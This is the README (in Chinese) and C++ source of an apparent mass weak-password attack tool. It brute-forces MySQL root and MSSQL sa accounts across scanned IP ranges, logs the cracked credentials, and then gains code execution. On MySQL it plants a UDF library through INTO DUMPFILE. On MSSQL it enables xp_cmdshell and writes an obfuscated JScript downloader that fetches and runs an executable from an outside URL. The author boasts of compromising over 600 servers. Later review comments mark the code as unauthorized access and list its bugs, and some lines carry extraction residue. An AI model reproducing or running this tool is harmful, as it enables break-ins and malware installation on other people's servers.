本工具可以同时进行mysql和mssql的弱口令扫描,并上传文件执行.
扫描成功获得弱口令账号密码后会自动根据版本信息保存扫描日志
mysql:
成功得到root密码后,新建表插入udf.dll二进制数据,并创建函数执行.
操作完成后会删除使用的表;但在mysql>=5.1分支中,创建的函数silly3r_x以及写入plugin目录的silly3r_x.so并不会删除,会留在目标机器上.
自动获取并根据mysql版本进行操作,mysql>=5.1的自动获得plugin目录进行导出操作(代码中的判断为:主版本号为5且次版本号>=1,或主版本号>5).
不提供udf的源码(挺简单)
mssql:
成功得到sa密码后,尝试开启xp_cmdshell,执行命令
命令为jscript脚本.(比FTP方便)
操作执行完成后通过sp_configure将xp_cmdshell置0;但代码中的"恢复"步骤再次调用的是sp_addextendedproc而非sp_dropextendedproc,且show advanced options仍保持为1.
(没怎么用,所以功能简单)
每次猜解密码前会先对目标端口(3306/1433)做一次TCP连接探测(IsPortOpen,select超时4秒),而不是ICMP ping;探测不通则跳过该主机.
端口扫描使用s扫描器
扫描通过读取程序目录的res.txt文件得到扫描的ip段
格式为
mysql和mssql一起扫:1 192.168.0.1 192.168.0.254[3306,1433]
单独扫一个:1 192.168.0.1 192.168.0.254[3306]
默认端口扫描线程为512 ,详见源码
默认并发密码猜解线程为100 (中间有Sleep 为低配置的机器考虑,详见源码)
mysql SDK 自行到mysql.com或者baidu,google下载
此代码在vs2008中编译成功,无任何错误.
由于配置错误或者编译器等等问题,本人一概不解释.
本人已利用此工具,得到600多台服务器,由于觉得无大用,所以早早停止了使用.
此代码写了很有些时日了,为vc初学者的练手题,所以代码中的错误,逻辑问题 牛哥们请自行修改
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <time.h>
#include <string>
#include <sql.h>
#include <sqlext.h>
#include "I:\\vs\\mysqlApi\\include\\mysql.h"
/*Code by s!lly3r Mail:silly3r@gmail.com*/
#pragma comment(lib,"I:\\vs\\mysqlApi\\lib\\libmysql.lib")
#pragma comment(lib,"Ws2_32.lib")
using namespace std;
// Target-type tags stored in data::type (assigned in _tmain from the port column of Result.txt).
#define XMYSQL 1
#define XMSSQL 2
// Private thread messages. The macro bodies are not parenthesized; every use site in this
// file passes them as a plain argument or `case` label, which is the only reason it works.
#define MY_MSG WM_USER+100   // Thread1 -> check(): one target finished; wParam carries the batch tag
#define EX_MSG WM_USER+101   // _tmain -> Timer(): batch drained early, stop the 40 s timeout
// TCP connect probe with a 4-second select() timeout (this is the "ping" of the header text).
BOOL IsPortOpen(char * address, int port);
// Per-target worker: brute-forces the DB login and, on success, attempts remote code execution.
DWORD WINAPI Thread1(LPVOID lpParameter);
// Message-loop thread that counts MY_MSG completions for the current batch into nMAX.
DWORD WINAPI check(LPVOID lpParameter);
// Message-loop thread that sets the global Timeout after 40 s unless EX_MSG arrives first.
DWORD WINAPI Timer(LPVOID lpParameter);
// Work item handed to Thread1. Allocated in _tmain with `new data` and released there with
// `delete[]` once the worker has raised `state` — a new/delete[] mismatch (undefined behaviour).
struct data
{
char ip[16];   // dotted-quad target, NUL-terminated by strcpy_s in _tmain
int type;      // XMYSQL or XMSSQL
//HANDLE nhth;
};
//int state=0;
// Process-wide state. None of it is synchronized: `state`, `nMAX`, `Timeout` and `nFlag` are
// written by one thread and polled by another as plain (non-volatile, non-atomic) globals.
int ThreadMax=512;      // thread count passed to s.exe on its command line
int CrackMax=100;       // workers dispatched per batch before _tmain waits for completions
char s_type[]="syn";    // scan-mode argument for s.exe
bool state=false;       // hand-off flag: Thread1 sets it once it has copied its data* out
long respos=0;          // file offset in res.txt of the next line scanner() will consume
DWORD dw_ThreadId=NULL; // thread id of check(), target of MY_MSG
DWORD dw2_ThreadId=NULL;// thread id of the current Timer(), target of EX_MSG
int nMAX=0;             // completions counted by check() for the current batch
int nFlag=0;            // batch tag; Thread1 captures it and echoes it in MY_MSG's wParam
bool Timeout=false;     // set by Timer() when the 40 s batch timeout fires
bool scanner();         // runs one res.txt line through s.exe, producing Result.txt
// Passwords tried, in order, for the MySQL `root` account (see Thread1). The final entry is
// the empty string, so a blank root password is the last attempt.
char *mypass[]={
"root",
"mysql",
"123456",
"pass",
"password",
"abc123",
"iloveyou",
"12345",
"1234",
"123",
"admin",
"12",
"1",
"11",
"111",
"1111",
"11111",
"111111",
""
};
// Passwords tried, in order, for the MSSQL `sa` account (see Thread1). A blank sa password
// is the first attempt.
char *mspass[]={
"",
"sa",
"pass",
"password",
"abc123",
"iloveyou",
"admin",
"1",
"12",
"123",
"1234",
"12345",
"123456",
"root",
"11",
"111",
"1111",
"11111",
"111111"
};
// Entry point. Loop: run s.exe on the next res.txt line (scanner()), then read the
// resulting Result.txt and dispatch one Thread1 per "ip port" record, in batches of
// CrackMax. A batch is considered finished when check() has counted at least 80% of its
// workers back (nMAX >= 0.8*i) or the 40 s Timer() has fired. Nothing here is
// synchronized: state, nMAX, Timeout and nFlag are plain globals shared with the workers.
// NOTE(review): this program performs unauthorized access against third-party hosts; the
// annotations below record what the code does and where it is defective, they are not fixes.
int _tmain()
{
FILE *f;
char buff[50];
srand((unsigned)time(NULL));
// nFlag is a per-batch tag; workers echo it back in MY_MSG so that late completions
// from an earlier batch are ignored by check().
nFlag=GetTickCount()+rand()%999;
// The returned thread handle is discarded (never closed); only the id is kept for posting.
CreateThread(NULL,NULL,check,NULL,NULL,&dw_ThreadId);
int i=0;   // workers dispatched in the current batch
while(true)
{
if(!scanner()){
printf("rror\n");   // sic: message is missing its leading 'E'
Sleep(1000);
return 0;
}
Sleep(1000);
// fopen_s returns the errno_t itself; GetLastError() is not set by it, so the number printed is unrelated.
if(fopen_s(&f,"Result.txt","r"))
{
printf("Error%d\n",GetLastError());
return 0;
}
while(true)
{
if(fgets(buff,50,f)==NULL)break;
// Only fixed-width 41-character lines of s.exe's /save output are accepted.
if(strlen(buff)!=41)continue;
if(i<=CrackMax){
if(buff[1]==0x2E || buff[2]==0x2E || buff[3]==0x2E) /*0x2E '.'*/
{
char *ip=new char[16];
data *pdata=new data;
char *temp=new char[4];
// BUG: sizeof(ip) is the size of the pointer, not 16; only the first 4/8 bytes are zeroed.
// `temp` is never zeroed at all.
memset(ip,0,sizeof(ip));
// Copy the dotted-quad up to the first space, then read the port starting at column 17.
for(int j=0;j<=15;j++)
{
if(buff[j]==0x20)
{
ip[j]=0;
j=17;
// BUG: j runs 17..21 (five positions) into the 4-byte temp buffer and no NUL is
// appended, so atoi(temp) below reads past the allocation whenever the port is 4 digits.
for(int t=0;j<=21;j++)
{
if(buff[j]==0x20)break;
temp[t]=buff[j];
t++;
}
break;
}
ip[j]=buff[j];
}
memset(pdata->ip,0,sizeof(pdata->ip));
strcpy_s(pdata->ip,sizeof(pdata->ip),ip);
if(atoi(temp)==1433)
{
pdata->type=XMSSQL;
}else if(atoi(temp)==3306)
{
pdata->type=XMYSQL;
}else{
// ip, pdata and temp are leaked on this path.
printf("result.txt error");
continue;
}
state=false;
// Worker handle discarded (never closed). Thread1 copies *pdata, then sets state=true.
CreateThread(NULL,NULL,&Thread1,(LPVOID)pdata,0,0);
i++;
Sleep(100);
// Busy-wait until the worker has taken its copy of pdata, then free the inputs.
while(true){
if(state)
{
// BUG: pdata came from `new data`, not `new[]`; delete[] here is undefined behaviour.
delete[] pdata;
pdata=NULL;
delete[] ip;
ip=NULL;
delete[] temp;
temp=NULL;
break;
}
Sleep(1);
}
}else{
continue;
}
}else{
// Batch full: wait for >= 80% of the dispatched workers to report back, or for the 40 s timer.
// NOTE: the record just read into buff is dropped — this branch never dispatches it.
Sleep(2000);
Timeout=false;
CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
while(true){
if(nMAX>=0.8*i || Timeout){
nFlag=GetTickCount()+rand()%999;   // new batch tag; late MY_MSGs from this batch are ignored
nMAX=0;
printf(".W");
// If Timer() already exited on WM_TIMER there is no queue to post to; the failure is not checked.
PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
break;
}
Sleep(10);
}
i=0;
}
}
// Same drain as above for the final, partial batch of this Result.txt.
if(i>0)
{
Sleep(2000);
Timeout=false;
CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
while(true){
if(nMAX>=0.8*i || Timeout){
nFlag=GetTickCount()+rand()%999;
nMAX=0;
printf(".W");
PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
break;
}
Sleep(10);
}
}
fclose(f);
Sleep(2000);
}
Sleep(1000);
return 0;
}
// Per-target worker (started by _tmain with a data* that _tmain frees once `state` is set).
// Copies the target out of lpParameter, probes the port, then walks the hard-coded password
// list for root (MySQL) or sa (MSSQL). On a successful login it appends "host|password|..."
// to a local log file and attempts remote code execution: MySQL via a UDF written with
// SELECT ... INTO DUMPFILE, MSSQL via xp_cmdshell. Every exit path posts MY_MSG with the
// captured batch tag to check().
// NOTE(review): these are intrusion steps against third-party hosts. The comments record
// what the code does, the artifacts it leaves on the target, and where it is defective;
// they do not repair it.
DWORD WINAPI Thread1(LPVOID lpParameter)
{
// state=1;
char *host=new char[16];
int type;
// HANDLE handle;
// BUG: sizeof(host) is the pointer size, not 16 (strcpy_s below terminates the string anyway).
memset(host,0,sizeof(host));
type=((data*)lpParameter)->type;
strcpy_s(host,16,((data*)lpParameter)->ip);
// Signal _tmain that lpParameter has been copied and may be freed.
state=true;
// Capture the batch tag now; _tmain may change nFlag before this worker finishes.
DWORD nTflag=nFlag;
if(type==XMYSQL)
{
if(!IsPortOpen(host,3306))
{
printf(".X");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;   // leaks host
}
printf(".M");
MYSQL *sock;
sock=mysql_init(0);
if(!sock)
{
// Only logs; execution continues with a NULL handle.
printf("Mysql sock Init Error %s",mysql_error(sock));
}
// Try each password for user root against the `mysql` database.
for(int i=0;i<sizeof(mypass)/sizeof(char*);i++){
if(mysql_real_connect(sock,host,"root",mypass[i],"mysql",3306,NULL,NULL))
{
string ver=mysql_get_server_info(sock);
printf(".-m-");
// Version gate on the raw version string: major digit '5' (53) with minor digit >= '1' (49),
// or major digit > '5'. A two-digit major version is not handled by this single-character test.
if((static_cast<int>(ver.c_str()[0]) == 53 && static_cast<int>(ver.c_str()[2]) >= 49) ||
static_cast<int>(ver.c_str()[0]) > 53 )
{
MYSQL_RES *res;
MYSQL_ROW row=NULL;
char dir[MAX_PATH]={0};
char _dir[MAX_PATH]={0};
char Tmp[MAX_PATH]={0};
// Locate plugin_dir (5.1+ only loads UDFs from there). A value starting with '/' is taken
// as a non-Windows host and the target is abandoned.
mysql_query(sock,"show variables like '%plugin%'");
res=mysql_use_result(sock);
// res is not NULL-checked (mysql_use_result returns NULL on failure), and mysql_num_fields
// counts columns, not rows — an empty result still reaches row[1] with row == NULL.
if(mysql_num_fields(res)>=2)
{
row=mysql_fetch_row(res);
strcpy_s(Tmp,MAX_PATH,row[1]);
if(row[1][0]=='/')
{
mysql_close(sock);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;   // res is never freed on this path
}
// Re-escape the path for use inside a SQL string literal: each '/' or '\' becomes "\\\\".
// NOTE(review): `dir` is MAX_PATH bytes but `num` is never bounds-checked and grows by two
// per separator, so a server returning a long plugin_dir can overrun it.
int num=0;
for(int ii=0;ii<=lstrlen(row[1]);ii++)
{
if(Tmp[ii]!='\\' && Tmp[ii]!='/')
dir[num]=row[1][ii];
else if(Tmp[ii]=='/'){
dir[num]='\\';
dir[num+1]='\\';
num+=2;
continue;
}else{
dir[num]='\\';
dir[num+1]='\\';
num++;
}
num++;
}
}else{
strcpy_s(dir,MAX_PATH,"c:\\\\windows");
}
mysql_free_result(res);
// The "&nbs, p;" prefix on the next line is HTML-extraction residue, not source code.
&nbs, p; mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
// Placeholder: in the author's build this INSERT carries the UDF DLL bytes (see comments below).
mysql_query(sock,"INSERT INTO `silly3r_x` VALUES (...)");
//(author) this is where the UDF binary is inserted; suggested: put the bytes in a separate .h as a variable
//(author) the UDF was built with VC6, does download-and-execute only, and can be kept under 5 KB
Sleep(500);
// Writes the blob to <plugin_dir>\silly3r_x.so (requires the FILE privilege). This file is
// never removed, so it remains on disk as an artifact.
sprintf_s(_dir,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE '%s\\\\silly3r_x.so' FROM silly3r_x",dir);
mysql_query(sock,_dir);
Sleep(500);
// Registers the UDF `silly3r_x`. Unlike the staging table it is never dropped here, and in
// this branch it is never invoked either — only the table is cleaned up.
mysql_query(sock,"CREATE FUNCTION silly3r_x RETURNS STRING SONAME 'silly3r_x.so'");
mysql_query(sock,"DROP TABLE `silly3r_x`");
ofstream mylog;
mylog.open("Mysql_5.1.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version>5.0"<<endl;
mylog.close();
// Major digit <= '5' and "nt"/"NT" in the version string: treated as an older Windows build.
// There is no plugin_dir to honour, so the DLL is dumped into both c:\windows and c:\winnt.
}else if((static_cast<int>(ver.c_str()[0]) <=53) && (ver.find("nt")<ver.length() || ver.find("NT")<ver.length()))
{
//mysql_query(sock,"use mysql");
mysql_query(sock,"DROP FUNCTION udown");
mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
// `udf` is not declared anywhere in this file (expected from the author's separate header).
mysql_query(sock,udf);
Sleep(500);
mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\windows\\\\silly3r_x.so' FROM silly3r_x");
Sleep(500);
mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\winnt\\\\silly3r_x.so' FROM silly3r_x");
Sleep(500);
// The function registered here is named `silly3r`, while the call and both DROPs use `udown`.
mysql_query(sock,"CREATE FUNCTION silly3r RETURNS STRING SONAME 'silly3r_x.so';");
// Download-and-execute via the UDF. silly3r_x.so is left on disk afterwards.
mysql_query(sock,"SELECT udown(\"http://www.T00ls.net/s!illy3r.exe\")");
Sleep(500);
mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"DROP FUNCTION udown");
ofstream mylog;
mylog.open("Mysql_5.0.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
mylog.close();
}else{
// Anything else (non-Windows or unrecognised version string): log the credentials only.
ofstream mylog;
mylog.open("Mysql_UNIX.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
mylog.close();
}
mysql_close(sock);
delete host;   // allocated with new[], released with scalar delete
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}else{
// 1045 (ER_ACCESS_DENIED_ERROR) means wrong password: try the next one. Any other error
// (unreachable, host blocked, protocol error, ...) abandons this target.
if(mysql_errno(sock)==1045)
{
//printf(".m");
//PostThreadMessage(nThreadId,MY_MSG,0,0);
}else{
//PostThreadMessage(nThreadId,MY_MSG,0,0);
mysql_close(sock);
//CloseHandle(thandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}
}
}
// Password list exhausted without a login.
mysql_close(sock);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
//CloseHandle(thandle);
return 1;
}else if(type==XMSSQL)
{
if(!IsPortOpen(host,1433))
{
printf(".X");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;   // leaks host
}
printf(".S");
SQLUINTEGER nTimeout=4;
SQLHANDLE henv,chandle,query; //SQL environment handle
char szBuffer[128]= {0};
SWORD swStrLen;
SQLRETURN ret;
if(SQLAllocHandle(SQL_HANDLE_ENV,NULL,&henv)!=SQL_SUCCESS)
{
printf("SQLAllocHandle error");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;   // leaks host
}
if(SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER)!=SQL_SUCCESS)
{
printf("SQLSetEnvAttr error");
SQLFreeHandle(SQL_HANDLE_ENV,henv);
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;   // leaks host
}
SQLAllocHandle(SQL_HANDLE_DBC,henv,&chandle);
//SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
// These are SQLGetConnectAttr calls: they read the driver's current value into nTimeout
// rather than applying 4 s (SQLSetConnectAttr was presumably intended), so the connection
// and login timeouts stay at the driver defaults.
SQLGetConnectAttr(chandle, SQL_ATTR_CONNECTION_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);
SQLGetConnectAttr(chandle, SQL_ATTR_LOGIN_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);
// Try each password for `sa`, building a fresh connection string per attempt.
for(int i=0; i<sizeof(mspass)/sizeof(char*);i++)
{
string str1="DRIVER={SQL Server};SERVER=";
str1+=host;
str1+=",1433;UID=sa;PWD=";
str1+=mspass[i];
str1+=";DATABASE=master";
printf(".s");
ret=SQLDriverConnect(chandle,NULL,(SQLCHAR *)str1.c_str(),str1.length(),
(SQLCHAR *)szBuffer,sizeof(szBuffer),&swStrLen, SQL_DRIVER_COMPLETE_REQUIRED);
if(ret==SQL_SUCCESS || ret==SQL_SUCCESS_WITH_INFO)
{
printf(".-s-");
// Credentials are logged before anything else is attempted. Return codes of every
// SQLExecDirect below are ignored.
ofstream mslog;
mslog.open("mssql.txt",ios::app|ios::out|ios::_Noreplace);
mslog<<host<<"|"<<mspass[i]<<endl;
mslog.close();
// Step 1: (re)register xp_cmdshell from xplog70.dll in case it had been dropped.
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
// Step 2: enable xp_cmdshell via sp_configure (the surface-area option on SQL Server 2005+).
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
// Step 3: echo an obfuscated JScript downloader (Microsoft.XMLHTTP + ADODB.Stream +
// WScript.Shell, class names split across string concatenations) into cc.js, a relative
// path in whatever directory xp_cmdshell's cmd.exe runs in. ">>" appends, so repeated
// successes accumulate copies in the same file.
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'echo var u=\"http://www.T00ls.net/s!illy3r.exe\";try{var xav=\"DB.S\";var xav1=\"ipt.S\"+\"h\";var xml=new ActiveXObject(\"Microsoft.XMLHTTP\");xml.open(\"Get\",u,false);xml.send();var as=new ActiveXObject(\"A\"+/*123*/\"D\"+\"O\"+xav+\"tre\"+\"am\");as.Type=1;as.Open();as.write(xml.responseBody);as.SaveToFile(\"temp.exe\",2);as.Close();var w=new ActiveXObject(\"Ws\"+/*555*/\"c\"+\"r\"+xav1+\"ell\");w.run(\"temp.exe\",0);}catch(e){}>>cc.js'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
// Step 4: run the script. cc.js and the downloaded temp.exe are left behind on the host.
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'wscript.exe cc.js'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
// "Cleanup": this re-runs sp_addextendedproc rather than sp_dropextendedproc, so the
// extended-procedure registration is not undone; only the sp_configure flag is reset
// below, and 'show advanced options' is left at 1.
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLDisconnect(chandle);
//delete[] &szBuffer;
// The environment handle is freed before its child connection handle — the reverse of the
// order ODBC requires.
SQLFreeHandle(SQL_HANDLE_ENV,henv);
SQLFreeHandle(SQL_HANDLE_DBC,chandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
}
// Password list exhausted without a login.
SQLDisconnect(chandle);
//delete[] &szBuffer;
SQLFreeHandle(SQL_HANDLE_ENV,henv);
SQLFreeHandle(SQL_HANDLE_DBC,chandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}else{
///....................
}
// Unknown type: host is leaked here.
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}
// Runs the external port scanner "s.exe" on the next line of res.txt and waits for it to
// exit. A res.txt line looks like `1 192.168.0.1 192.168.0.254[3306,1433]`; the '[' is
// replaced by a space and the string is cut at ']' so the range and port list become plain
// command-line arguments. s.exe's /save output is expected in Result.txt, which _tmain
// parses. Returns false on any open/read/format error (the caller then exits).
bool scanner()
{
DeleteFile("Result.txt");
FILE *res;
char buffer[60];
if(fopen_s(&res,"res.txt","r"))
{
printf("res.txt open error %d\n",GetLastError());   // fopen_s returns the errno_t itself; GetLastError() is unrelated
return 0;
}
// respos remembers where the previous call stopped, so each call consumes exactly one line.
fseek(res,respos,SEEK_SET);
if(fgets(buffer,60,res)==NULL)
{
printf("fgets res.txt error\n");
Sleep(3000);
return 0;   // res is not closed on this path
}
respos=ftell(res);
// Require a closing ']' (0x5D) either just before the trailing newline or as the last character.
if(strlen(buffer)<25 || buffer[strlen(buffer)-2]!=0x5D)
{
if(buffer[strlen(buffer)-1]!=0x5D){
printf("res.txt error\n");
Sleep(3000);
return 0;   // res is not closed on this path
}
}
fclose(res);
// BUG: num has 63 elements but the loop runs i<=63 and also writes num[i+1]; buffer itself
// is only 60 bytes, so this reads past buffer and can write past num.
char num[63]={0};
for(int i=0;i<=63;i++)
{
if(buffer[i]!=0x5B && buffer[i]!=0x5D)
{
num[i]=buffer[i];
}else if(buffer[i]==0x5B)
{
num[i]=0x20;   // '[' -> space
}else if(buffer[i]==0x5D)
{
// ']' -> num[i] stays 0 (string ends here); num[i+1] is zeroed as well.
num[i+1]=0x00;
//if(buffer[i+1]==0x5B)
//{
// num[i]=0x2C;
// //break;
//}else{
// break;
//}
}
}
STARTUPINFO si;
memset(&si,0x0,sizeof(si));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOW;
PROCESS_INFORMATION pi;
char *cmd=new char[80];
// The res.txt text is spliced into the command line with no validation beyond the ']' check above.
sprintf_s(cmd,80,"s.exe %s %s %d /save",s_type,num,ThreadMax);
printf("%s\n",cmd);
if(!CreateProcess(NULL,cmd,NULL,NULL,0,NULL,NULL,NULL,&si,&pi))
{
printf("s.exe start error...%d",GetLastError());
return 0;   // cmd is leaked on this path
}
// Blocks until s.exe exits; pi.hProcess / pi.hThread are never closed.
WaitForSingleObject(pi.hProcess,INFINITE);
delete[] cmd;
cmd=NULL;
return true;
}
// Completion-counter thread. The initial PeekMessage forces a message queue into existence
// (per Win32, PostThreadMessage fails until the target thread has one, so any worker that
// finishes before this line runs is simply not counted). Every MY_MSG whose wParam equals
// the current batch tag nFlag increments nMAX; stale tags are dropped and EX_MSG is ignored.
// The loop never exits.
DWORD WINAPI check(LPVOID lpParameter)
{
MSG msg;
PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);
//SetTimer(0,0,60000,NULL);
while(true)
{
if(GetMessage(&msg,0,0,0))
{
switch(msg.message)
{
case MY_MSG:
if(msg.wParam==nFlag)nMAX++;   // nFlag may be rewritten by _tmain concurrently; no synchronization
break;
case EX_MSG:
//
break;
}
}
}
return 0;
}
// One-shot batch timeout thread. SetTimer with a NULL window queues WM_TIMER to this
// thread after 40 000 ms; on WM_TIMER the global Timeout is set and the thread exits, on
// EX_MSG (posted by _tmain when the batch drained early) it exits without setting it.
// KillTimer is never called on either path.
DWORD WINAPI Timer(LPVOID lpParameter)
{
MSG msg;
PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);   // create the thread's message queue first
SetTimer(0,0,40000,NULL);
while(true)
{
if(GetMessage(&msg,0,0,0))
{
switch(msg.message)
{
case WM_TIMER:
Timeout=true;
return 0;
break;
case EX_MSG:
Timeout=false;
return 0;
break;
}
}
}
return 0;
}
// Non-blocking TCP connect probe (the "ping" of the header text): returns TRUE when
// select() reports the socket writable within 4 s. Notes on the code as written:
//  - WSAStartup/WSACleanup are run per call; WSACleanup is skipped on the socket() and
//    gethostbyname() failure paths, and the socket is leaked on the latter.
//  - The local `recv` shadows the Winsock recv() function.
//  - The socket is made non-blocking before connect(), so connect() returns immediately
//    (WSAEWOULDBLOCK) and its result is ignored.
//  - FD_ISSET is tested on the set *before* select() has run, so it is always true.
//  - Only the write set is polled. On Windows a failed non-blocking connect is reported in
//    the except set, so a refused port is not observed and costs the full 4 s timeout;
//    on POSIX a failed connect also marks the socket writable, so this would report
//    "open" without checking SO_ERROR.
//  - The stray leading "," on the select() line is extraction residue, not source code.
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd;
ULONG value = 1;
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return 0;
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
WSACleanup();
return 0;
}
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
ioctlsocket(fd,FIONBIO,&value);   // non-blocking from here on
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return 0;
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 4;
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd);
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
, recv = select(fd+1, NULL, &writefd, NULL, &timer4);
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}